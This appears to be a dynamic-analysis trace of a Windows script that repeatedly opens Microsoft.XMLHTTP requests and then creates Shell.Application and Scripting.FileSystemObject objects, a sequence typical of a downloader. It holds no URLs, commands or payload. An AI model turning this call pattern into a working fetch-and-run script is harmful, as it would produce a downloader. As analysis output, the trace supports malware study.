	[0317.131] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0317.132] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7538) returned 0x0
	[0317.132] ??2@YAPEAX_K@Z () returned 0x62f310
	[0317.132] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7538, pUnkSite=0x62f310) 
	[0317.132] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0317.132] XMLHTTPRequest:IUnknown:Release (This=0x49c7538) returned 0x0
	[0317.132] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0317.132] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0317.132] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0317.132] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0317.132] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0317.132] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0317.132] SysStringLen (param_1=0x0) returned 0x0
	[0317.132] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0317.132] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0317.132] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c60) returned 0x0
	[0317.132] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0317.132] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0317.133] ??2@YAPEAX_K@Z () returned 0x62f330
	[0317.133] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0317.133] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0317.133] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0317.133] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c60) returned 0x0
	[0317.133] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c60) returned 0x3
	[0317.133] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0317.133] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0317.133] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0317.133] longjmp () 
	[0317.133] longjmp () 
	[0317.133] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0317.133] SysStringLen (param_1=0x0) returned 0x0
	[0317.134] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0317.134] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0317.134] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7530) returned 0x0
	[0317.134] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0317.134] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0317.134] ??2@YAPEAX_K@Z () returned 0x62f310
	[0317.134] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f310) 
	[0317.134] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0317.134] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0317.134] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7530) returned 0x0
	[0317.134] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7530) returned 0x3
	[0317.134] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0317.135] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7530, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0317.135] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0317.135] longjmp () 
	[0317.135] longjmp () 
	[0317.135] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0317.135] SysStringLen (param_1=0x0) returned 0x0
	[0317.135] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0317.135] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0317.135] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c72a0) returned 0x0
	[0317.136] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0317.136] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7308) returned 0x0
	[0317.136] ??2@YAPEAX_K@Z () returned 0x62f330
	[0317.136] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7308, pUnkSite=0x62f330) 
	[0317.136] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0317.136] XMLHTTPRequest:IUnknown:Release (This=0x49c7308) returned 0x0
	[0317.136] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c72a0) returned 0x0
	[0317.136] XMLHTTPRequest:IUnknown:AddRef (This=0x49c72a0) returned 0x3
	[0317.136] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0317.136] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0317.136] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0317.136] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0317.136] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0317.136] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0318.623] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0318.623] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0318.623] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0318.624] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0318.624] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0318.624] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0318.624] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0318.624] SysStringLen (param_1=0x0) returned 0x0
	[0318.624] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0318.624] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0318.624] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0318.624] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0318.624] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0318.624] ??2@YAPEAX_K@Z () returned 0x62f350
	[0318.624] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0318.624] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0318.624] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0318.625] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0318.625] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0318.625] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0318.625] SysStringLen (param_1=0x0) returned 0x0
	[0318.625] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0318.637] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0318.637] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0318.637] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0318.637] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0318.637] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0318.637] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0319.231] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0319.231] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0319.231] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0319.232] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0319.232] SysStringLen (param_1=0x0) returned 0x0
	[0319.232] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0319.232] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0319.232] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c72a0) returned 0x0
